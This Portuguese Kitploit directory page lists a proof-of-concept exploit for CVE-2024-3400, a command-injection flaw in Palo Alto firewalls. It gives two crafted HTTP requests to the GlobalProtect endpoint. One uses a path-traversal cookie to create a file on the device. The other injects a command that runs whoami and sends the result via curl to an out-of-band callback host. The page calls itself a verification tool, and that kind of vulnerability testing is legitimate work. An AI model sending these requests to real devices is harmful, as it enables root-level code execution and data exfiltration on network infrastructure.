Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3400-poc — Prova de conceito de exploit para CVE-2024-3400, uma vulnerabilidade de injeção de comandos em firewalls Palo Alto, demonstrando criação de arquivos e execução remota de comandos por meio de requisições HTTP elaboradas. | Kitploit
Ferramentas/GitHubGitHub/ghassansabir/cve-2024-3400-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubghassansabir/cve-2024-3400-poc

CVE-2024-3400-poc

Prova de conceito de exploit para CVE-2024-3400, uma vulnerabilidade de injeção de comandos em firewalls Palo Alto, demonstrando criação de arquivos e execução remota de comandos por meio de requisições HTTP elaboradas.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC da Vulnerabilidade CVE-2024-3400 (Ferramenta de Verificação)

Descrição da Vulnerabilidade

A CVE-2024-3400 é uma vulnerabilidade de injeção de comandos presente no sistema de firewall da Palo Alto. Um atacante, por meio de uma solicitação HTTP cuidadosamente elaborada, consegue executar comandos maliciosos no servidor de destino, podendo até obter privilégios de root.

Etapas para Reproduzir a Vulnerabilidade

  1. Envie a seguinte solicitação HTTP:
root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Após enviar esta solicitação, você criará um arquivo chamado hellome1337.txt no servidor, e esse arquivo terá privilégios de root.

  1. Ao tentar acessar esse arquivo, você deverá receber o código de status HTTP 403 (Acesso Proibido), em vez de 404 (Não Encontrado).

A captura de tela demonstra o efeito durante o processo de exploração desta vulnerabilidade:

image

image

Exemplo de Injeção de Comandos

Para explorar a vulnerabilidade e executar a injeção de comandos, você pode enviar a seguinte solicitação HTTP:

root@kitploit:~
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Esta solicitação executará o comando whoami no servidor e enviará o resultado para o servidor remoto especificado (por exemplo: xxxxxxxxxxxxxxxxx.oast.fun).

Leitura Adicional

  • Análise da Rapid7
  • Análise do Laboratório WatchTowr
Baixar ferramenta